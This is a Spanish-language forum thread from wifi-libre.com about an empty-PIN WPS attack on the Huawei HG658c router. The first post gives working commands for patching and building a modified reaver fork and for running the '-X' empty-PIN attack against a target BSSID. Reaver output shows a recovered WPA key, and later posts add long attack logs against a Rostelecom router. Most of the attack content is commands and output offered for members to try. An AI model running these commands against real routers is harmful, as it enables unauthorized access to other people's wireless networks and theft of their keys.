Crack WPS mandando un PIN "en blanco" (null) (Pagina 1) / Preguntas generales y busqueda de nuevas brechas / Foro Wifi-libre.com

El libre pensamiento para un internet libre

No estas registrado.     

Anuncio

Wifi-libre.com: El libre pensamiento para un internet libre / Regístrese ahora

#1 30-03-2017 11:31:36

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 3,196

Crack WPS mandando un PIN "en blanco" (null)

Crack WPS sobre Huawei HG658c con un PIN en blanco

WPS_empty_PIN_5.jpg

binarymaster del foro antichat.ru nos ha señalado un caso singular en esta "issue" de la rama Git Hub de reaver 1.5.3:

WPS_empty_PIN_1_20170330-1137.jpg

Habla de dos cosas:
  - Los routeurs que emplean un PIN "no conforme" (que no respetan la regla del checksum WPS) .
Un caso que conocemos bien en España con los routers Amper ASL-26555 cuyo eSSID por defecto es de tipo  WLAN_XXXX y con un inicio de bSSID en 8C:0C:A3.
  - Cita también a un caso muy peculiar observado en un Huawei HG658c y nos dirige hacía este articulo:

Veamos juntos que pasa con esto de "mandar un PIN vacío".
El articulo no está tremendamente documentado pero se sigue sin problemas el desarrolló de los eventos.     

  Algunas palabras sobre el HG658c... Es una box huawei muy parecida a... una box huawei. big_smile

WPS_empty_PIN_3.jpg

Se empela en irlanda, no se con que ISP, probablemente en otros lugares también.
Se ve en la etiqueta que no tiene PIN WPS (por lo menos no ponen ninguno)

WPS_empty_PIN_2.jpg

  La interfaz web de gestión del dispositivo es muy (demasiado) minimalista:

WPS_empty_PIN_4.jpg

  Hay un botón para activar y desactivar el WPS "de forma global" y luego podemos elegir entre PBC y PIN.
En este caso el router está en modo PBC
El autor del articulo (me parece que su nick es james Bond pero no lo tengo claro) empieza entonces un ataque de fuera bruta.
Aquí podéis ver el stdout (desgraciadamente sin el nivel máximo de "verbose")

[email protected]:~/reaver/new/src# reaver -i mon0 -c 6 -b 68:A0:F6:01:02:03 -v

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212 & Wiire & kib0rg

[+] Waiting for beacon from 68:A0:F6:01:02:03
[+] Associated with 68:A0:F6:01:02:03 (ESSID: vodafone-XXXX)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Pin count advanced: 1. Max pin attempts: 11000
[+] Trying pin 00005678.
[+] Pin count advanced: 2. Max pin attempts: 11000
[+] Trying pin 01235678.
[+] Pin count advanced: 3. Max pin attempts: 11000
[+] Trying pin 11115670.
[+] Pin count advanced: 4. Max pin attempts: 11000
[+] Trying pin 22225672.
[+] Pin count advanced: 5. Max pin attempts: 11000
[+] Trying pin 33335674.
[+] Pin count advanced: 6. Max pin attempts: 11000
[+] 0.05% complete. Elapsed time: 0d0h0m16s.
[+] Trying pin 44445676.
[+] Pin count advanced: 7. Max pin attempts: 11000
[+] Trying pin 55555678.
[+] Pin count advanced: 8. Max pin attempts: 11000
[+] Trying pin 66665670.
[+] Pin count advanced: 9. Max pin attempts: 11000
[+] Trying pin 77775672.
[+] Pin count advanced: 10. Max pin attempts: 11000
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
^C
[+] Session saved.

  El ataque adelanta hasta llegar a provocar un bloqueo del WPS.
Diez PIN fueron comprobados: El WPS en modo PIN está habilitado.
  Esto ha despertado la curiosidad del amigo James Bond (o como se llame)
Se ha conectado en los puertos SERIAL del punto de acceso para iniciar una sesión  con interprete de ordenes ATP

Connected to 192.168.1.1.
Escape character is '^]'.
-------------------------------
-----Welcome to ATP Cli------
-------------------------------

Login: !!Huawei
Password: 
ATP>sh


BusyBox vv1.9.1 (2014-02-08 20:26:13 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

Ha podido comprobar el valor atribuido al PIN WPS.

# nvram show  | grep wps_device_pin  
size: 2659 bytes (30109 left)
wps_device_pin=

  Podéis ver que no está definido ningún valor.
Un PIN "en blanco", su valor es "NULL".
  El WPS en modo PIN está habilitado pero el PIN no está definido.

Entonces ha modificado reaver para poder probar con un PIN vacío con un patch.
El PIN se manda vació se manda con la opción nueva ( -B )

[email protected]:~/reaver# git clone https://github.com/t6x/reaver-wps-fork-t6x.git reaver
[email protected]:~/reaver# cd reaver
[email protected]:~/reaver/reaver# patch -p1 < ../emptystringpin.diff 
[email protected]:~/reaver/reaver# cd src/
[email protected]:~/reaver/reaver/src# ./configure ; make
[email protected]:~/reaver/reaver/src# ./reaver -i mon0 -c 6 -b 68:A0:F6:01:02:03 -v -B


Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212 & Wiire & kib0rg

[+] Waiting for beacon from 68:A0:F6:01:02:03
[+] Associated with 68:A0:F6:01:02:03 (ESSID: vodafone-XXXX)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] WPS PIN: '12345670'
[+] WPA PSK: 'SuperSecretWifiPassword'
[+] AP SSID: 'vodafone-XXXX'

No es muy calro porque no ha modificado la salida de reaver
Lo que hace el patch es que sobrescribe el PIN 12345670 con un una cadena vacía. 
El PIN mandado no tiene valor definido y el routeur.... devuelve la llave. roll

  Es un caso muy interesante: Muchas interfaces WPS requieren que se define un PIN además de habilitar el WPS.
Es muy posible toparnos con un router con el WPS habilitado y sin PIN definido.
O porque el usuario lo ha dejado así o porque viene así de fabrica.

He pensado enseguida en los routers jazztell de ZTE.
Ya sabéis, tienen el WPS un poco raro, está deshabilitado sin ser deshabilitado del todo.
  He probado y no ha dado resultados.
  Hace falta hacer más pruebas sobre routers configurados con el WPS habilitado sin PIN definido.
   Para ver si es un método que podemos aplicar de forma general o si funciona solo con ciertos chipsets/firmware/dispositivos.

Es en todos casos una vía nueva a explorar. cool
  Si queréis hacer pruebas les recomiendo usar la modificación de binarymaster en lugar del patch propuesto en el blog.
La podéis instalar así:

 git clone https://github.com/binarymaster/reaver-wps-fork-t6x.git
 cd reaver-wps-fork-t6x
 cd src
 ./configure
 make
 sudo make install

Para hacer el ataque con PIN vació debéis emplear el argumento -X
Aconsejo añadir el ataque -n por sí las moscas.
Algo así:

sudo reaver -i <interfaz> -b <bssid_objetivo> -c <canal> -X -n -vvv

Así solo vale para probar un PIN vacío.
Si no le sale debéis parrar el ataque y iniciar otro sin la opción -X en caso de que queréis seguir un ataque de fuerza bruta convencional.

Desconectado

Anuncio

Wifi-libre.com: El libre pensamiento para un internet libre / Regístrese ahora

#2 30-03-2017 11:48:49

Koala
Very Important Usuario

Registrado: 11-09-2016
Mensajes: 375

Re: Crack WPS mandando un PIN "en blanco" (null)

Por defecto esta el WPS activado con el PBC ? big_smile


Hay cosas que no entiendo.. desde tiempo ahora se sabe que el WPS tiene vulnaribilidad y lo dejan activado.. cuanto redes en espana tienen el wps activado por defecto tambien ?

Desconectado

#3 30-03-2017 12:21:35

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 3,196

Re: Crack WPS mandando un PIN "en blanco" (null)

Por defecto esta el WPS activado con el PBC ? big_smile

Exacto.
El WPS habilitado con el modo PBC y el modo PIN
Lo que pasa es que no definen un PIN.
Dejando así el WPS en modo PIN "entre dos aguas"

Hay cosas que no entiendo.. desde tiempo ahora se sabe que el WPS tiene vulnaribilidad y lo dejan activado.. cuanto redes en espana tienen el wps activado por defecto tambien ?

Muchas. Por no decir casi todas.
Hay que decir también que casí todas tienen bloqueo del WPS
Pero siguen dejando la posibilidad de encontrar un algoritmo, un PIN genérico o una brecha nueva y de poder explotarla.
El único ISP que ha realmente hecho algo al respecto de forma radical es jazztell 
Han "roto" el WPS en modo PIN con un update generalizado del firmware de sus routers.
Las otras tele-operadoras se limitan a tener el bloqueo del WPS activado.

Desconectado

#4 30-03-2017 17:50:57

Patcher
Very Important Usuario

Registrado: 14-01-2016
Mensajes: 325

Re: Crack WPS mandando un PIN "en blanco" (null)

Tenia pendiente consultarte esto por que también a mi me lo han reportado desde antichat.ru para que lo implemente en waircut. No estaba seguro de si era una trolada, veo que no, por lo que lo pondré también en waircut.

Desconectado

#5 30-03-2017 21:01:18

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 3,196

Re: Crack WPS mandando un PIN "en blanco" (null)

No creo que sea una trolada... Esto sí: Falta documentación y tampoco te lo puedo asegurar...
He mirrado las otras entradas en este blog y se ve que hay un trabajo serio sobre este router.
Molaría mucho tener un routeur que se podría dejar con el PIN no configurado... He mirrado en unos cuantos y no podía. 
  He intentado con el PIN "GIVEkey" también big_smile

Seleccion_373.png

No funcionó... tongue big_smile

Les dejo aquí el stdout hecho desde el foro antichat:

[email protected]:~# ./reaver -i wlan0mon -b D4:76:EA:хх:хх:хх -c 6 -v -N -B "" -vvv

Reaver v1.5.3 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212 & Wiire & AAnarchYY & KokoSoft

[+] Switching wlan0mon to channel 6
[?] Restore previous session for D4:76:EA:хх:хх:хх? [n/Y] n
[+] Waiting for beacon from D4:76:EA:хх:хх:хх
[+] Associated with D4:76:EA:хх:хх:хх (ESSID: ROSTELECOM-хх)
[+] Starting Cracking Session. Pin count: 10000, Max pin attempts: 11000
[+] Trying pin ""
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 8 seconds
[+] WPS PIN: ''
[+] Nothing done, nothing to save.

Y otro hecho en modo "--debug"

[email protected]:~/reaver/src# ./reaver -i wlan0mon -b D4:76:EA:xx:xx:xx -c 6 -vvv -p "" -N

Reaver v1.5.3 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212 & Wiire & AAnarchYY & KokoSoft

[+] Switching wlan0mon to channel 6
[+] Waiting for beacon from D4:76:EA:xx:xx:xx
[+] Associated with D4:76:EA:xx:xx:xx (ESSID: ROSTELECOM-xx)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
WPS: A new PIN configured (timeout=0)
WPS: UUID - hexdump(len=16): [NULL]
WPS: PIN - hexdump_ascii(len=0):
WPS: Selected registrar information changed
WPS: Internal Registrar selected (pbc=0)
WPS: sel_reg_union
WPS: set_ie
WPS: cb_set_sel_reg
WPS: Enter wps_cg_set_sel_reg
WPS: Leave wps_cg_set_sel_reg early
WPS: return from wps_selected_registrar_changed
[+] Trying pin ""
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
WPS: Processing received message (len=539 op_code=4)
WPS: Received WSC_MSG
WPS: attr type=0x104a len=1

.................................

[+] Received M5 message
WPS: Processing received message (len=158 op_code=4)
WPS: Received WSC_MSG
WPS: attr type=0x104a len=1
WPS: attr type=0x1022 len=1
WPS: attr type=0x1039 len=16
WPS: attr type=0x1018 len=112
WPS: attr type=0x1005 len=8
WPS: Parsed WSC_MSG
WPS: Received M7
WPS: Unexpected state (12) for receiving M7
WPS: WPS_CONTINUE, Freeing Last Message
WPS: WPS_CONTINUE, Saving Last Message
WPS: returning
[+] Received M7 message
WPS: Building Message WSC_NACK
WPS: * Version
WPS: * Message Type (14)
WPS: * Enrollee Nonce
WPS: * Registrar Nonce
WPS: * Configuration Error (0)
[+] Sending WSC NACK
WPS: Building Message WSC_NACK
WPS: * Version
WPS: * Message Type (14)
WPS: * Enrollee Nonce
WPS: * Registrar Nonce
WPS: * Configuration Error (0)
[+] Sending WSC NACK
[+] Pin cracked in 15 seconds
[+] WPS PIN: ''
[+] Nothing done, nothing to save.
WPS: Full PIN information revealed and negotiation failed
WPS: Invalidated PIN for UUID - hexdump(len=16): 63 04 12 53 10 19 20 06 12 28 41 44 53 4c 20 4d

Al final el PIIN en blanco está crackeado pero no permite obtener la llave.
Desgraciadamente no da los detalles sobre su router y su configuración.
ver: Уязвимость в протоколе Wi-Fi Protected Setup

Desconectado

Anuncio

Wifi-highpower.es es distribuidor oficial de Alfa Network

Pie de página

Información del usuario

Ultimo usuario registrado: AndresFree
Usuarios registrados conectados: 1
Invitados conectados: 14

Conectados: claudioruiz

Estadisticas de los foros

Número total de usuarios registrados: 670
Número total de temas: 863
Número total de mensajes: 7,187

Máx. usuarios conectados: 61 el 28-03-2017 00:04:22